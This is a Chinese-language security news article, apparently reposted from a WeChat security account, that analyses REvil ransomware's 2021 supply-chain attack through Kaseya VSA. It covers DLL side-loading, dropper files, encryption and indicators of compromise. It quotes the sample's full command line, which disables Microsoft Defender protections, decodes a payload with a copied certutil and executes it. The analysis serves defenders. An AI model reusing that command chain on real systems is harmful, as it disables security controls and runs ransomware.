REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

  • A+
所属分类:安全新闻
REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击点击上方蓝字关注我们

REvil勒索软件团伙在其暗网数据泄漏站点上发布了一条消息,声称他们已于2021年7月2日入侵了MSP提供商Kaseya,并表明已有100万个系统受到勒索软件的影响。该团伙要求Kaseya支付7000万美元的BTC,以为所有受害者公开发布解密器。


REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

Kaseya是一家IT服务提供商,提供自动化软件和远程管理软件,该公司在7月2日发布声明,确认其下远程监控和管理软件工具Kaseya VSA遭到攻击,目前已经关闭了其SaaS服务器,并且建议所有客户关闭VSA服务器。

研究人员表明,REvil勒索软件针对Kaseya VSA执行的大规模供应链攻击,已经影响了多家托管服务提供商(MSP)及其客户,如Synnex Corp和Avtex LLC。勒索软件是通过产品的自动更新机制分发的。Kaseya VSA具有客户端系统的管理员权限,这使得勒索软件可以客户系统中轻松传播。

REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

Kaseya VSA 是一个自动化的软件补丁和漏洞管理系统。REvil勒索软件团伙通过嵌入恶意DLL文件的Kaseya VSA代理修复程序,利用虚假恶意更新向客户端投递REvil加密器有效载荷。名为“agent.exe”的代理修复程序使用“MsMpEng.exe”防御程序可执行文件,侧加载到合法的Microsoft Defender中。

样本分析


研究人员近期发现REvil勒索软件样本的哈希值为D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E。


该勒索软件主要由一个释放器,以及VC编译的、包含“SOFTIS”和“MODLIS”恶意资源的二进制文件组成。如下图所示,该样本在运行时会加载资源,资源文件是REvil有效载荷“mpsvc.dll”和“MsMpEng.exe”加载器(loader)。


REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

Dropper


执行时,释放器会在以下系统目录中创建REvil有效载荷和loader文件。


  • C:Windowsmpsvc.dll(在合法的Microsoft Defender中侧加载)

  • C:WindowsMsMpEng.exe(合法loader文件)


下图显示了释放到受害者机器上的有效载荷,及其执行过程。


REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

有效载荷


成功安装后,REvil有效载会立即加密所有文档文件。


REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

进程浏览器


最后,勒索软件会锁定受害者的屏幕,并附上勒索说明。此外,REvil还会试图执行PowerShell 命令,以禁用Microsoft Defender服务


C:WINDOWSsystem32cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe


研究人员发现每个系统都使用不同的扩展名进行加密,这表明勒索软件可能是通过系统信息随机生成扩展名的。


勒索说明文件中包含一个链接,其只能通过文件中的密钥访问。该链接属于REvil勒索软件团伙,其中包含与赎金金额、解密器和计时器相关的信息。


IOC


8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd

e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2

d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

9b46d03b690bda0df57c0ebb8dae0aebdd1d131beb500242fa8fe59cb260eed1

hxxp[:]//aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion


REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

END



REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击


好文!必须在看

本文始发于微信公众号(SecTr安全团队):REvil勒索软件团伙利用Kaseya VSA发起大规模供应链攻击

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: